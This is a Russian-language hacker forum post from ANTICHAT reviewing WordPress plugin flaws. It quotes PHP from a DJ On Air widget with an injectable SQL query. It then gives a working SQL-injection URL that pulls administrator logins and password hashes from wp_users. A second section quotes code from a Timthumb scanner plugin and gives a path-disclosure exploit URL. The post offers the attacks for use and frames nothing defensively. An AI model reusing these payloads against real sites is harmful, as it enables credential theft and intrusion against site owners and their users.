ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей WordPress ]

DJ On Air Widget SQL-inj

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"].....

[/COLOR][COLOR="#0000BB"]$dj_ids[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `meta`.`user_id` FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"usermeta AS `meta`

                                                WHERE `meta_key` = 'shifts' 

                                                AND `meta_value` LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sDayTime[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"%';"   

[/COLOR][COLOR="#007700"]);

.....

        foreach([/COLOR][COLOR="#0000BB"]$dj_ids[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$fetch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"users AS `user` WHERE `user`.`ID` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]$djs[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$fetch[/COLOR][COLOR="#007700"];

        }

    .....[/COLOR][/COLOR]

exploit:

Код:

http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_users+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+WHERE+meta_value=0x613A313A7B733A31333A2261646D696E6973747261746F72223B623A313B7D)--+

Timthumb Vulnerability Scanner раскрытие путей

этот ваще пена xD

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]....

   if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cg-action'[/COLOR][COLOR="#007700"]])){

      switch([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cg-action'[/COLOR][COLOR="#007700"]]){

        case[/COLOR][COLOR="#DD0000"]'scan'[/COLOR][COLOR="#007700"]:

          include_once[/COLOR][COLOR="#DD0000"]'cg-tvs-filescanner.php'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$scanner[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]CG_FileScanner[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]WP_CONTENT_DIR[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$scanner[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]generate_inventory[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$scanner[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]scan_inventory[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]update_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'cg_tvs_last_checked'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]update_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'cg_tvs_vulnerable_files'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$scanner[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]VulnerableFiles[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]update_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'cg_tvs_safe_files'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$scanner[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SafeFiles[/COLOR][COLOR="#007700"]);

        case[/COLOR][COLOR="#DD0000"]'fix'[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]$nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'_wpnonce'[/COLOR][COLOR="#007700"]];

          if([/COLOR][COLOR="#0000BB"]wp_verify_nonce[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nonce[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'fix_timthumb_file'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$fix_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]urldecode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$src_file_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trailingslashit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]'cg-tvs-timthumb-latest.txt'[/COLOR][COLOR="#007700"];

            if([/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]$fr[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$src_file_path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'r'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$latest_src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$src_file_path[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fr[/COLOR][COLOR="#007700"]);

            }else{

[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"CAN'T READ TIMTHUMB SOURCE FILE"[/COLOR][COLOR="#007700"];

              break;

            }

            if([/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]$fw[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fix_path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"])){

              if([/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fw[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$latest_src[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"File "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fix_path[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]" at "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$fix_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" successfully upgraded."[/COLOR][COLOR="#007700"];

              }else{

[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Unknown file write error."[/COLOR][COLOR="#007700"];

              }

            }else{

[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"CAN'T OPEN VULNERABLE FILE FOR WRITING"[/COLOR][COLOR="#007700"];

              break;

            }

....[/COLOR][/COLOR]

exploit:

Код:

http://wp/wp-content/plugins/tvulnerscanner/cg-tvs-filescanner.php?file[]=